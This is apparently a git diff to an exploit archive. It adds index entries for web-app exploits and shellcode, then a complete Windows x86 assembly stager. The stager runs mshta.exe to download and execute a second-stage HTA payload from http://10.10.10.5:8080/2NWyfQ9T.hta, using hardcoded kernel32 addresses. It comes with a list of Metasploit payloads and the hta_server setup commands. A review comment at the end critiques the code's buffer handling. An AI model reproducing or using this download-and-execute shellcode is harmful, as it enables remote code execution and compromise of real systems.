+49454,exploits/hardware/webapps/49454.txt,"Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS",2021-01-22,LiquidWorm,webapps,hardware,
+49455,exploits/hardware/webapps/49455.txt,"Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite",2021-01-22,LiquidWorm,webapps,hardware,
+49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
+49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
+49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",2021-01-22,LiquidWorm,webapps,hardware,
+49459,exploits/hardware/webapps/49459.txt,"Selea Targa IP OCR-ANPR Camera - RTP/RTSP/M-JPEG Stream Disclosure (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
+49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",2021-01-22,LiquidWorm,webapps,hardware,
+49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",2021-01-22,Photubias,webapps,java,
+49462,exploits/php/webapps/49462.py,"Library System 1.0 - Authentication Bypass Via SQL Injection",2021-01-22,"Himanshu Shukla",webapps,php,
+49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",2021-01-22,"Himanshu Shukla",webapps,php,
+49464,exploits/multiple/webapps/49464.py,"ERPNext 12.14.0 - SQL Injection (Authenticated)",2021-01-22,Hodorsec,webapps,multiple,
+49465,exploits/multiple/webapps/49465.py,"Atlassian Confluence Widget Connector Macro - SSTI",2021-01-22,46o60,webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 91bbba5c5..3ca8863af 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1,7 +1,7 @@
id,file,description,date,author,type,platform
14113,shellcodes/arm/14113.c,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",shellcode,arm
-49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux
-49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Socat Bind Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86
+49442,shellcodes/linux/49442.c,"Linux/x64 - Reverse (127.1.1.1:4444/TCP) Shell (/bin/sh) Shellcode (123 Bytes)",2021-01-19,"Guillem Alminyana",shellcode,linux
+49446,shellcodes/linux_x86/49446.c,"Linux/x86 - Bind Socat (0.0.0.0:1000/TCP) Shell (Bash) Shellcode (113 bytes)",2021-01-20,"Felipe Winsnes",shellcode,linux_x86
13241,shellcodes/aix/13241.c,"AIX - execve(/bin/sh) Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",shellcode,aix
13242,shellcodes/bsd/13242.txt,"BSD - Reverse (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes)",2000-11-19,Scrippie,shellcode,bsd
13243,shellcodes/bsd_ppc/13243.c,"BSD/PPC - execve(/bin/sh) Shellcode (128 bytes)",2004-09-26,Palante,shellcode,bsd_ppc
@@ -1025,6 +1025,7 @@ id,file,description,date,author,type,platform
48585,shellcodes/arm/48585.c,"Linux/ARM - execve(/bin/dash) Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm
48592,shellcodes/linux_x86/48592.c,"Linux/x86 - Disable ASLR Security + Polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86
-48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter(0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
+48703,shellcodes/linux_x86/48703.c,"Linux/x86 - Egghunter (0x50905090) + sigaction + execve(/bin/sh) Shellcode (35 bytes)",2020-07-26,danf42,shellcode,linux_x86
48718,shellcodes/windows_x86/48718.c,"Windows/x86 - Download File (http://192.168.43.192:8080/9MKWaRO.hta) Via mshta Shellcode (100 bytes)",2020-07-26,"Siddharth Sharma",shellcode,windows_x86
49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
+49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
diff --git a/shellcodes/windows_x86/49466.asm b/shellcodes/windows_x86/49466.asm
new file mode 100644
index 000000000..cbc16cfba
--- /dev/null
+++ b/shellcodes/windows_x86/49466.asm
@@ -0,0 +1,185 @@
+# Exploit Title: Windows/x86 - Stager Generic MSHTA Shellcode (143 bytes)
+# Exploit Author: Armando Huesca Prida
+# Date: 11-01-2021
+# Tested on: Windows 7 Professional 6.1.7601 SP1 Build 7601 (x86)
+# Windows Vista Ultimate 6.0.6002 SP2 Build 6002 (x86)
+# Windows Server 2003 Enterprise Edition 5.2.3790 SP1 Build 3790 (x86)
+
+## Description: Windows x86 Shellcode that uses mshta.exe binary to execute a second stage payload delivered through metasploit's hta_server exploit. This shellcode uses JMP/CALL/POP technic and static kernel32.dll functions addresses.
+
+## Metasploit compatible payload list:
+
+# generic/custom
+# generic/debug_trap
+# generic/shell_bind_tcp
+# generic/shell_reverse_tcp
+# generic/tight_loop
+# windows/dllinject/bind_hidden_ipknock_tcp
+# windows/dllinject/bind_hidden_tcp
+# windows/dllinject/bind_ipv6_tcp
+# windows/dllinject/bind_ipv6_tcp_uuid
+# windows/dllinject/bind_named_pipe
+# windows/dllinject/bind_nonx_tcp
+# windows/dllinject/bind_tcp
+# windows/dllinject/bind_tcp_rc4
+# windows/dllinject/bind_tcp_uuid
+# windows/dllinject/reverse_hop_http
+# windows/dllinject/reverse_http
+# windows/dllinject/reverse_http_proxy_pstore
+# windows/dllinject/reverse_ipv6_tcp
+# windows/dllinject/reverse_nonx_tcp
+# windows/dllinject/reverse_ord_tcp
+# windows/dllinject/reverse_tcp
+# windows/dllinject/reverse_tcp_allports
+# windows/dllinject/reverse_tcp_dns
+# windows/dllinject/reverse_tcp_rc4
+# windows/dllinject/reverse_tcp_rc4_dns
+# windows/dllinject/reverse_tcp_uuid
+# windows/dllinject/reverse_winhttp
+# windows/dns_txt_query_exec
+# windows/download_exec
+# windows/exec
+# windows/loadlibrary
+# windows/messagebox
+# windows/meterpreter/bind_hidden_ipknock_tcp
+# windows/meterpreter/bind_hidden_tcp
+# windows/meterpreter/bind_ipv6_tcp
+# windows/meterpreter/bind_ipv6_tcp_uuid
+# windows/meterpreter/bind_named_pipe
+# windows/meterpreter/bind_nonx_tcp
+# windows/meterpreter/bind_tcp
+# windows/meterpreter/bind_tcp_rc4
+# windows/meterpreter/bind_tcp_uuid
+# windows/meterpreter/reverse_hop_http
+# windows/meterpreter/reverse_http
+# windows/meterpreter/reverse_http_proxy_pstore
+# windows/meterpreter/reverse_https
+# windows/meterpreter/reverse_https_proxy
+# windows/meterpreter/reverse_ipv6_tcp
+# windows/meterpreter/reverse_named_pipe
+# windows/meterpreter/reverse_nonx_tcp
+# windows/meterpreter/reverse_ord_tcp
+# windows/meterpreter/reverse_tcp
+# windows/meterpreter/reverse_tcp_allports
+# windows/meterpreter/reverse_tcp_dns
+# windows/meterpreter/reverse_tcp_rc4
+# windows/meterpreter/reverse_tcp_rc4_dns
+# windows/meterpreter/reverse_tcp_uuid
+# windows/meterpreter/reverse_winhttp
+# windows/meterpreter/reverse_winhttps
+# windows/metsvc_bind_tcp
+# windows/metsvc_reverse_tcp
+# windows/patchupdllinject/bind_hidden_ipknock_tcp
+# windows/patchupdllinject/bind_hidden_tcp
+# windows/patchupdllinject/bind_ipv6_tcp
+# windows/patchupdllinject/bind_ipv6_tcp_uuid
+# windows/patchupdllinject/bind_named_pipe
+# windows/patchupdllinject/bind_nonx_tcp
+# windows/patchupdllinject/bind_tcp
+# windows/patchupdllinject/bind_tcp_rc4
+# windows/patchupdllinject/bind_tcp_uuid
+# windows/patchupdllinject/reverse_ipv6_tcp
+# windows/patchupdllinject/reverse_nonx_tcp
+# windows/patchupdllinject/reverse_ord_tcp
+# windows/patchupdllinject/reverse_tcp
+# windows/patchupdllinject/reverse_tcp_allports
+# windows/patchupdllinject/reverse_tcp_dns
+# windows/patchupdllinject/reverse_tcp_rc4
+# windows/patchupdllinject/reverse_tcp_rc4_dns
+# windows/patchupdllinject/reverse_tcp_uuid
+# windows/patchupmeterpreter/bind_hidden_ipknock_tcp
+# windows/patchupmeterpreter/bind_hidden_tcp
+# windows/patchupmeterpreter/bind_ipv6_tcp
+# windows/patchupmeterpreter/bind_ipv6_tcp_uuid
+# windows/patchupmeterpreter/bind_named_pipe
+# windows/patchupmeterpreter/bind_nonx_tcp
+# windows/patchupmeterpreter/bind_tcp
+# windows/patchupmeterpreter/bind_tcp_rc4
+# windows/patchupmeterpreter/bind_tcp_uuid
+# windows/patchupmeterpreter/reverse_ipv6_tcp
+# windows/patchupmeterpreter/reverse_nonx_tcp
+# windows/patchupmeterpreter/reverse_ord_tcp
+# windows/patchupmeterpreter/reverse_tcp
+# windows/patchupmeterpreter/reverse_tcp_allports
+
+
+# "hta_server" exploit payloads setting example:
+
+# msf6 > use exploit/windows/misc/hta_server (exploit for second stage payload delivery)
+# msf6 exploit(windows/misc/hta_server) > set payload windows/exec (a payload from the previously specified list)
+# msf6 exploit(windows/misc/hta_server) > set uripath 2NWyfQ9T.hta (a static value for URIPATH)
+# msf6 exploit(windows/misc/hta_server) > set CMD calc.exe (command to be executed ex: calc.exe binary)
+# msf6 exploit(windows/misc/hta_server) > run (second stage delivery server execution)
+
+
+# Shellcode considerations:
+
+# Function address of CreateProcessA in kernel32.dll: 0x75732082
+# Function address of ExitProcess in kernel32.dll: 0x7578214f
+# Size in bytes of message db parameter, 65 bytes -> 0x41 hex
+# Message db contains a strings with the static path windows location of mshta.exe binary and the url obtained from hta_server exploit
+
+
+# Assembly Shellcode:
+
+
+
+global _start
+
+section .text
+
+_start:
+ jmp application
+
+firststep:
+ pop edi
+ xor eax, eax
+ mov [edi+65], al ; size in bytes of message db parameter
+
+StartUpInfoANDProcessInformation:
+
+ push eax ; hStderror null in this case
+ push eax ; hStdOutput, null
+ push eax ; hStdInput, null
+ xor ebx, ebx
+ xor ecx, ecx
+ add cl, 0x12 ; 18 times loop to fill both structures.
+
+looper:
+ push ebx
+ loop looper
+
+ ;mov word [esp+0x3c], 0x0101 ; dwflag arg in startupinfo
+ mov bx, 0x1111
+ sub bx, 0x1010
+ mov word [esp+0x3c], bx
+ mov byte [esp+0x10], 0x44 ; cb=0x44
+ lea eax, [esp+0x10] ; eax points to StartUpInfo
+
+ ; eax has a pointer to StartUPinfo
+ ; esp has a pointer to Process_Info containing null values
+createprocessA:
+ push esp ; pointer to Process-Info
+ push eax ; pointer to StartUpInfo
+ xor ebx, ebx
+ push ebx ; null
+ push ebx ; null
+ push ebx ; null
+ inc ebx
+ push ebx ; bInheritHandles=true
+ dec ebx
+ push ebx ; null
+ push ebx ; null
+ push edi ; pointer to message db string
+ push ebx ; null
+ mov edx, 0x75732082 ; CreateProcessA addr in kernel32.dll
+ call edx
+
+ExitProcess:
+ push eax ; createprocessA return in eax
+ mov edx, 0x7578214f ; ExitProcess addr in kernel32.dll
+ call edx
+
+application:
+ call firststep
+ message db "c:\windows\system32\mshta.exe http://10.10.10.5:8080/2NWyfQ9T.hta"
\ No newline at end of file
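Review bot: The terminator write at `mov [edi+65], al` lands one byte past the end of the shellcode: the `message` string is exactly 65 bytes and is the last thing in the blob, so the null goes to offset 143 of a 143-byte payload, and the comment only says "size in bytes of message db parameter". The line should state the precondition, e.g. `mov [edi+65], al ; NUL-terminate lpCommandLine: writes ONE BYTE PAST the 143-byte blob, so the buffer holding it must be writable and at least 144 bytes`. The same applies to the header block, which should also say that `0x75732082` and `0x7578214f` at `mov edx, ...` are kernel32 addresses valid only for the listed test builds (and, under ASLR, only while kernel32 is mapped at that base), so the code is build-specific rather than generic. The `mov bx, 0x1111 / sub bx, 0x1010` pair replacing the commented-out `mov word [esp+0x3c], 0x0101` is unexplained; the immediate `0x0101` already contains no null bytes, so either document the reason for the workaround or keep the single instruction.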